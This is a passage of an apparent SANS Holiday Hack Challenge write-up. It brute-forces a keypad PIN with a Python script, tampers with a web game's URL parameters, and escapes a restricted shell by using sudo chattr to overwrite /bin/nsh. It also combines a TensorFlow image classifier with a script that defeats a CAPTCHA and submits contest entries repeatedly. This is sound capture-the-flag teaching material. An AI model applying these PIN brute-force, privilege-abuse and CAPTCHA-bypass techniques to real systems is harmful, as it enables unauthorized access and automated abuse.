Simply yield is used when we want to iterate over a sequence but don’t want to store the entire sequence in memory, allowing us to generate the digits faster.

Finally, we call our definition with our valid_digits list and print the value back to the screen. Since the value being returned is a tuple, we call the map function to iterate over each value in the tuple, and finally we use join to join all those digits into a single 4-digit pin.

If we execute this code, we should see something like so:

root@kali:~/HH/frosty_keypad# python3 code_breaker.py 
1137
1173
1317
1337
1371
---snip---

As you can see, only 1 digit is repeated once, and not multiple times!

Perfect! So now let’s combine these two together to generate the pin, and validate if it is a prime number.

Combined, the code should look like so:

#!/usr/bin/python3

import math
from itertools import product

valid_digits = [1,3,7]

def generate(valid_numbers):
    from itertools import product
    possible_digits = len(valid_numbers)
    for raw in product(valid_numbers, repeat=4):
        if len(set(raw)) == possible_digits:
            yield raw

isPrime = True
for nums in generate(valid_digits):
	pin = ''.join(map(str, nums))
	for x in range(2, int(math.sqrt(int(pin)) + 1)):
		if int(pin) % x == 0:
			isPrime = False
			break
		if isPrime:
			print(pin)
			break

Running the code, we get the following output:

root@kali:~/HH/frosty_keypad# python3 code_breaker.py 
1137
1173
1317
1337
1371
1373
1377
1713
1731
1733
1737
1773
3117
3137
3171
3173
3177
3317
3371
3711
3713
3717
3731
3771
7113
7131
7133
7137
7173
7311
7313
7317
7331
7371
7713
7731

Perfect, so using some awesome math, and some Python magic we generated all the valid pin codes that are 4 digits long, use only one digit twice, and are a prime number.

Alright, with that, we now need to submit the values to the pin pad and validate which one of these is the correct pin. We can simply use our developer console in our browser to check the network traffic so we can grab the URL where we will need to submit the pin.

With that information in hand, let’s finalize our Python code to submit all values to the pin pad, and print only the one that returns a success code of True.

#!/usr/bin/python3

import math
import json
import urllib.request
from itertools import product

valid_digits = [1,3,7]

def generate(valid_numbers):
    from itertools import product
    possible_digits = len(valid_numbers)
    for raw in product(valid_numbers, repeat=4):
        if len(set(raw)) == possible_digits:
            yield raw

def validate(possible_pin):
	response = urllib.request.urlopen('https://keypad.elfu.org/checkpass.php?i=' + possible_pin + '&resourceId=41e5c834-b3e2-487d-8f57-f65f37ad9059')
	data = json.loads(response.read().decode('utf-8'))
	if data['success'] == True:
		print("Valid Pin Found: " + possible_pin)


isPrime = True
for nums in generate(valid_digits):
	pin = ''.join(map(str, nums))
	for x in range(2, int(math.sqrt(int(pin)) + 1)):
		if int(pin) % x == 0:
			isPrime = False
			break
		if isPrime:
			validate(pin)
			break

This code should be pretty self-explanatory, but let’s brief over it for those who are having trouble understanding it.

I create another function definition called validate and pass in our pin code as the variable possible_pin. From there we create a new variable called response which will contain the response from the web server.

We then parse the JSON data as UTF-8, and check if the success key from the JSON requests is equal to True. If it is, we print the correct pin code to the screen.

So, let’s run the script. Upon running it, we get the valid pin code!

root@kali:~/HH/frosty_keypad# python3 code_breaker.py 
Valid Pin Found: 7331

Awesome, let’s test this on the pin pad in game and see if it works!

And there we have it, we unlocked the door and can enter the dorms!

Holiday Hack Trail

Upon entering the dorms and going to the right, we meet Minty Candycane!

After talking with Minty, we learn that she loves old games and tells us that we should give it a go! She also explains that if we get stuck, we should check out this year’s talk - which would be Chris Elgee’s talk, Web Apps: A Trailhead.

After watching the video, Chris talks about basic web application hacking and value manipulation that can lead to issues in an application if the values passed back to the server are not validated; simple web app stuff!

So with that knowledge, let’s access the terminal and see what we have to work with.

Ahh cool, so this seems to be a remake of an old game known as Oregon Trail. So we have three modes to choose from, I like to make life easy, so we will choose easy mode.

Upon selecting that mode, we are presented with the following screen.

From the initial screen we can see that this allows us to purchase supplies needed for the game. At the bottom of the screen it also tells us what each supply does. It seems the more reindeer we have, the faster we go, and of course we need food and medication.

Okay, well I want to save my money, so let’s press BUY to continue and see what we get.

This screen now brings us to the game. We can do multiple things such as take medication, hunt, trade, or continue with our trail to the North Pole. It also lists a display of our inventory, and health conditions for our players.

Now, if we inspect the screen, I notice something odd. Let’s take a look at our URL.

Having some web application security background, and watching Chris’ video, this smells like Web Parameter Tampering. For those who don’t know what that is, it’s simply an attack that is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc.

Since the parameters for our game are in the URL, we can simply modify them and see if it affects our game in some way, shape, or form.

So, to test this, let’s change our reindeer parameter value from 2 to 125.

Once done, let’s press [ENTER] or the arrow by the URL and see what happens.

Hey, look at that! Our reindeer parameter changed in game and we now have 125 of them! Okay, but hold on, just because we changed the URL parameter, it doesn’t mean that the sever holds the same value.

So let’s manipulate some more parameters of your choosing and then press GO and see if the value still holds.

Awesome, it works! The values hold, we are now on day 2 and have 7912 left for our distance. We traveled a total of 88 miles or whatever, but I don’t want to keep clicking GO till we get to the end. So, let’s change that distance to 8000 as it was the original β€œremaining” amount in the URL and press [ENTER].

Once the value is updated, let’s press GO and see what we get.

And there we have it! We completed the game by cheating! ;)

Key Cutting

Upon successfully completing the Holiday Hack Train, we can talk to Minty again for more hints that will allow us to complete the next part of our objective.

From Minty, we learn about a key grinder in her room, as well as about someone hopping around with a key on campus which we can use to copy… hmmm.

Minty also give us a hint to watch Deviant’s talk for Optical Decoding of Keys.

Well with that in mind, let’s keep going right and enter Minty’s room. Upon entering Minty’s room we spot a very shady character with no name! But hold on, look! He has a key on him!

If we’re quick and sneaky, we can use our browsers dev tools to inspect the character image. Upon selecting the character and inspecting the image we see that it’s Krampus!

Following the background URL, we see the image of Krampus and we also see the key in better view!

Let’s zoom in on that key to get a better picture of it!

With that key in hand, we see that there is a machine on Minty’s desk. Clicking on it takes us to the following screen.

So this is a bitting machine which aids in cutting and programming keys of any type. If you watched Deviant’s talk then you should know a lot about this and how to use it!

Each β€œbite” for the key can range from 0 to 9, with 9 being a deeper β€œbite” or cut. If we inspect the key we got from Krampus we can see that the biting seems to be 1, 2 ,2 5, 2, 0 (this took some guessing and playing around with the machine).

If we enter that in the machine, we get the following key.

So, let’s save that image of the key we created for later purposes.

In Minty’s room we see another door, if we enter it, we see a closet with what seems to be a key hole.

If we click on the keyhole, we are presented with a lock and a key ring. Click on the key ring to upload our generated key, and let’s try to open the lock!

After opening the door successfully, we get access to a secret tunnel!

Get Access To The Steam Tunnels

With access to the new secret tunnel from Minty’s closet, we enter the tunnel and come across a β€œDanger Keep Out” sign.

We’re not scared, so let’s keep moving down the tunnel. At the end of the tunnel we come across our shady character, Krampus Hollyfeld!

Upon talking to Krampus we learn that he maintains the steam tunnels underneath Elf U, we also learn that if we can help Krampus solve objective 8 then he will tell us more of what’s going on with the turtle doves and the scraps of paper we found!

Well, at least now we know who took the doves. So with that information, we can navigate to the seventh objective in our badge and enter the name β€œKrampus Hollyfeld” to complete the objective.

Objective 8

NyanShell - CranPi

Upon successfully gaining access to the steam tunnels and talking with Krampus, we learn that we need to hep Krampus finish objective eight.

If we read the objective, we learn that for hints we can talk to Alabaster Snowball in the Speaker Unprepardedness Room.

So, from the tunnels, let’s go back to Hermey Hall, and access the room. There we will find Alabaster!

Talking to Alabaster we figure out what the challenge consists of, and of course we also get a couple of hints to help in completing the CranPi challenge.

It seems that something has gone horribly wrong with his terminal. Each time he logs into his account, he gets a toaster party? Overall it seems to be a shell issue, but Alabaster can’t overwrite it. Alabaster also give us a hint by stating that β€œon Linux, a user’s shell is determined by the contents of /etc/passwd”.

Alright, with that in mind, let’s access the terminal!

  
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–€β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–‘β–‘β–„β–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–ˆβ–„β–„β–‘β–‘β–„β–‘β–‘β–‘β–ˆβ–‘β–„β–„β–„β–‘β–‘β–‘
β–‘β–„β–„β–„β–„β–„β–‘β–‘β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–€β–‘β–‘β–‘β–‘β–€β–ˆβ–‘β–‘β–€β–„β–‘β–‘β–‘β–‘β–‘β–ˆβ–€β–€β–‘β–ˆβ–ˆβ–‘β–‘
β–‘β–ˆβ–ˆβ–„β–€β–ˆβ–ˆβ–„β–ˆβ–‘β–‘β–‘β–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–‘β–‘β–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–‘β–‘
β–‘β–‘β–€β–ˆβ–ˆβ–„β–€β–ˆβ–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–‘β–ˆβ–ˆβ–€β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–ˆβ–ˆβ–‘
β–‘β–‘β–‘β–‘β–€β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–€β–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–ˆβ–ˆβ–‘β–‘β–‘β–„β–ˆβ–‘β–‘β–‘β–‘β–„β–‘β–„β–ˆβ–‘β–‘β–ˆβ–ˆβ–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–ˆβ–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–‘β–‘β–‘β–‘β–„β–‘β–‘β–‘β–„β–‘β–‘β–„β–‘β–‘β–‘β–ˆβ–ˆβ–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–„β–ˆβ–„β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–€β–„β–‘β–‘β–€β–€β–€β–€β–€β–€β–€β–€β–‘β–‘β–„β–€β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–€β–€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–€β–€β–€β–€β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–€β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–€β–‘β–‘β–ˆβ–ˆβ–ˆβ–€β–‘β–‘β–‘β–‘β–‘β–‘β–€β–ˆβ–ˆβ–ˆβ–‘β–‘β–€β–ˆβ–ˆβ–€β–‘β–‘β–‘β–‘β–‘β–‘
β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘

nyancat, nyancat
I love that nyancat!
My shell's stuffed inside one
Whatcha' think about that?

Sadly now, the day's gone
Things to do!  Without one...
I'll miss that nyancat
Run commands, win, and done!

Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt.

Target Credentials:

username: alabaster_snowball
password: Password2
elf@5d7be8ae3e11:~$

Hey it’s nyan cat - that’s great haha! So, using the provided credentials for Alabaster, let’s login and see what happens.

elf@dfab2664ba73:~$ su alabaster_snowballPassword:
Password:

Hahaha, that’s great! Funny for us, but bad for Alabaster. Alright, let’s help this poor guy fix this issue.

After exiting this shell, let’s use Alabaster’s hint to see what /etc/passwd is set to for his user account.

elf@ba16afd01a1b:~$ cat /etc/passwd  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin  
elf:x:1000:1000::/home/elf:/bin/bash  
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh

Right away we can see that his shell upon login is set to /bin/nsh which isn’t normal for Linux. Okay, well Alabaster also mentioned something about using sudo -l which will list the allowed (and forbidden) sudo commands for the invoking user, so let’s run that and see what we get.

elf@5d7be8ae3e11:~$ sudo -l
Matching Defaults entries for elf on 5d7be8ae3e11:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elf may run the following commands on 5d7be8ae3e11:
    (root) NOPASSWD: /usr/bin/chattr

After executing the command, we see that we can run the /usr/bin/chattr binary as sudo with no password. Basically, the chattr command is used to change file attributes on a Linux file system.

These file attributes are in a specific symbolic mode format such as +-=[acdeijstuADST].

The letters acdeijstuADST select the new attributes for the files: append only (a), compressed (c), no dump (d), extent format (e), immutable (i), data journalling (j), secure deletion (s), no tail-merging (t), undeletable (u), no atime updates (A), synchronous directory updates (D), synchronous updates (S), and top of directory hierarchy (T).

So let’s see what sort of attributes are set for the /bin/nsh binary by using the lsattr command which will list file attributes of a specific file.

elf@5d7be8ae3e11:~$ lsattr /bin/nsh
----i---------e---- /bin/nsh

If you read the manual pages for these commands, then you will learn right away that the immutable attribute is set for this file. This attribute prevents anyone - even a root user - from deleting or modifying a file.

We can test this theory by trying to overwrite the data in that binary, as such.

elf@5d7be8ae3e11:~$ echo "test" > /bin/nsh 
-bash: /bin/nsh: Operation not permitted

Alright, well since we can run the chattr command with root permissions, let’s remove the immutable attribute from the file, and rewrite the binary with the bash shell.

elf@5d7be8ae3e11:~$ sudo /usr/bin/chattr -i /bin/nsh
elf@5d7be8ae3e11:~$ lsattr /bin/nsh
--------------e---- /bin/nsh
elf@5d7be8ae3e11:~$ cat /bin/bash > /bin/nsh

Nice, it worked! There’s only one way to see if everything worked well, and that’s to login with Alabaster account again.

elf@5d7be8ae3e11:~$su alabaster_snowball  
Password:  
Loading, please wait......

You did it! Congratulations!

And there we have it, we finished the terminal challenge!

Bypassing the Frido Sleigh CAPTEHA

Upon successfully completing the Nyanshell CranPi we can talk to Alabaster again for more hints that will allow us to complete the next objective.

For this objective we need to help Krampus beat the Frido Sleigh contest. Thanks to Alabaster, we learn that we can use machine learning to beat the CAPTHEA for the challenge, so let’s access the contest page and see what we have to work with.

Cool, so there’s just basic information that we need to fill out, and at the end we have a CAPTHEA challenge. Let’s click on it to see what we have.

Oh crap…. That’s a lot of images we need to select, and we only have 5 seconds to do it! How the heck can we complete this?

Well if we remember our talk with Krampus, he mentioned that he’s already cataloged 12,000 images and decoded the API interface for this challenge.

So, let’s download those files and see what we have to work with.

root@kali:~/HH/frido_sleigh# wget https://downloads.elfu.org/capteha_images.tar.gz
root@kali:~/HH/frido_sleigh# wget https://downloads.elfu.org/capteha_api.py
root@kali:~/HH/frido_sleigh# ls
capteha_api.py  capteha_images.tar.gz
root@kali:~/HH/frido_sleigh# mkdir capteha_images
root@kali:~/HH/frido_sleigh# tar -xzvf capteha_images.tar.gz -C capteha_images/
root@kali:~/HH/frido_sleigh# ls -la capteha_images/
total 760
drwxr-xr-x 8 root root   4096 Dec 24 15:14  .
drwxr-xr-x 3 root root   4096 Dec 24 15:15  ..
drwxrwxr-x 2 1000 1000 135168 Nov 26 14:40 'Candy Canes'
drwxrwxr-x 2 1000 1000 135168 Nov 26 14:40 'Christmas Trees'
drwxrwxr-x 2 1000 1000 126976 Nov 26 14:40  Ornaments
drwxrwxr-x 2 1000 1000 122880 Nov 26 14:40  Presents
drwxrwxr-x 2 1000 1000 126976 Nov 26 14:40 'Santa Hats'
drwxrwxr-x 2 1000 1000 122880 Nov 26 14:40  Stockings

Huh, so we got folders for the different images. So what?

Well, if we look back to the hint Alabaster gave us, we learn about some Machine Learning Use Cases for Cyber Security. In this video, Chris Davis explains how we can use machine learning for image recognition, and there is also a hint on beating captcha using this.

Thankfully, Chris provides us a link to his Image Recognition Using TensorFlow Machine Learning Demo GitHub repository.

In this repository we have information on TensorFlow and also have installation instructions on how to set up and train a machine learning model to recognize apples from bananas - which he demonstrated in his video.

Using the instructions in the GitHub repository, let’s clone the repository and install everything that we need.

Once that’s installed, let’s start by looking at the capthea_api.py file that was provided to us by Krampus.

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys

def main():
    yourREALemailAddress = "[email protected]"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images'] # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',') # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting
    
    '''
    MISSING IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''
    
    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    
    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed. 
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)

if __name__ == "__main__":
    main()

It seems that the code needed to submit all the data to the API has already been completed for us. All that we really need to do is to add the machine learning and image processing code for the CAPTHEA.

But first, we need to figure out how we can process all the image data that is stored in the b64_images dictionary.

If we look over the python code, we can see that the b64_images variable stores the base 64 image data of the image, along with an UUID (universally unique identifier) which will look like the following when we print the data to screen:

{u'base64': u'iVBORw0KGgoA...', u'uuid': u'b472b8dd-e584-11e9-97c1-309c23aaf0ac'}

So let’s attempt to take this data, and save it as an image file to disk. This way we can validate if we are actually getting images.

To do so, we will take the base64 image data by using base64_images[0]["base64"]) and save that to a temporary file under its corresponding UUID by using base64_images[0]["uuid"]).

So, we can add the following code to the machine learning section of our script:

import base64
img_data = base64.b64decode(b64_images[0]["base64"])
    with open("/tmp/imgs/"+b64_images[0]["uuid"], "wb") as file:
        file.write(img_data)

If we run that, we should see that our first image is saved successfully!

Now we can add code that will add the full dictionary of images by enumerating all the data and writing all of the images to the folder.

for i, (k,v) in enumerate(b64_images):
    img_data = base64.b64decode(b64_images[i]["base64"])
    with open("/tmp/imgs/"+b64_images[i]["uuid"], "wb") as file:
        file.write(img_data)

If we run that, we should see that all of our images are saved successfully!

Cool, but the issue we have here is that we only have 5 seconds to do this, so we need to process the data on the fly instead of saving data to disk.

Okay, well before we do that, we need to figure out how the image prediction algorithm is reading the image file. So, let’s open the predict_images_using_trained_model.py file and see what it does.

#!/usr/bin/python3
# Image Recognition Using Tensorflow Exmaple.
# Code based on example at:
# https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/label_image/label_image.py
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys

# sudo apt install python3-pip
# sudo python3 -m pip install --upgrade pip
# sudo python3 -m pip install --upgrade setuptools
# sudo python3 -m pip install --upgrade tensorflow==1.15

def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

def main():
    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to spead up the processing
    q = queue.Queue()
    unknown_images_dir = 'unknown_images'
    unknown_images = os.listdir(unknown_images_dir)
    
    #Going to interate over each of our images.
    for image in unknown_images:
        img_full_path = '{}/{}'.format(unknown_images_dir, image)
        
        print('Processing Image {}'.format(img_full_path))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = open(img_full_path,'rb').read()
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()
    
    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):
        time.sleep(0.001)
    
    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]
    
    #do something with our results... Like print them to the screen.
    for prediction in prediction_results:
        print('TensorFlow Predicted {img_full_path} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))

if __name__ == "__main__":
    main()

If we look toward the end of the main function, we see the following line:

image_bytes =  open(img_full_path,'rb').read()

Simply what this does is it takes the image path to where the file is located, opens it, and reads all the byte data. So instead of just saving a file to disk, we can modify this code with the code we wrote previously and just pass base64 decoded data into the image_bytes variable.

So for this to happen, we will need to update the logic of the predict_images_using_trained_model.py script.

First thing we will do is remove lines 67, 68, and 74 from the main function, since we won’t be accessing an image directory.

*** REMOVE THESE LINES ***
unknown_images_dir = 'unknown_images'
unknown_images = os.listdir(unknown_images_dir)
print('Processing Image {}'.format(img_full_path))

Next in the section where we will iterate over each of our images, we are going to rewrite that part with our previously written code, which will look like so.

#Going to iterate over each of our images.
print('Processing Images...')
    for i, (k,v) in enumerate(b64_images):
        img_data = base64.b64decode(b64_images[i]["base64"])
        img_uuid = b64_images[i]["uuid"]

Next, in lines 79-81 where the predict_image function is expecting png image bytes, we will rewrite that to pass our previous image data and UUID, instead of the file paths.

threading.Thread(target=predict_image, args=(q, sess, graph, img_data, img_uuid, labels, input_operation, output_operation)).start()

Finally, in lines 90-92 where we do something with our results, we will rewrite that so that we can grab the predicted image type, and validate them against the challenge_image_type list which will hold the expected list of images for the CAPTHEA. If the predicted type matches that of the challenge type, we append the UUID to our valid_types list.

The code will look like so.

valid_types = []
for prediction in prediction_results:
    prediction_img_type = ('{prediction}').format(**prediction)
    prediction_uuid = ('{img_full_path}').format(**prediction)
        if prediction_img_type in challenge_image_types:
            valid_types.append(prediction_uuid)

After all the modifications are done, the predict_images_using_trained_model.py main function should look like the one below:

def main():
    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to speed up the processing
    q = queue.Queue()
    
    #Going to iterate over each of our images.
    print('Processing Images...')
        for i, (k,v) in enumerate(b64_images):
            img_data = base64.b64decode(b64_images[i]["base64"])
            img_uuid = b64_images[i]["uuid"]
        
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        threading.Thread(target=predict_image, args=(q, sess, graph, img_data, img_uuid, labels, input_operation, output_operation)).start()
    
    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):
        time.sleep(0.001)
    
    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]
    
    #do something with our results... Like print them to the screen.
    valid_types = []
    for prediction in prediction_results:
        prediction_img_type = ('{prediction}').format(**prediction)
        prediction_uuid = ('{img_full_path}').format(**prediction)
            if prediction_img_type in challenge_image_types:
                valid_types.append(prediction_uuid)

Once we have that done, we can integrate our machine learning predict_images_using_trained_model.py script into our capthea_api.py script.

Note: There are some additional changes I made, see if you can spot them and figure out what they do! 😊

Also, make sure you change the yourREALemailAddress variable to your actual email so you can obtain the code!

The final code for this will look like so:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import base64
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys

# Predict Images Script
def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

###

def main():

    # Predictive Images Script
    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)
    
    # Can use queues and threading to spead up the processing
    q = queue.Queue()

    # Email address to get key
    yourREALemailAddress = "[email protected]"

    for numThreads in range(10, 50, 4):
        # Creating a session to handle cookies
        s = requests.Session()
        url = "https://fridosleigh.com/"

        json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
        b64_images = json_resp['images']  # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
        challenge_image_type = json_resp['select_type'].split(',')  # The Image types the CAPTEHA Challenge is looking for.
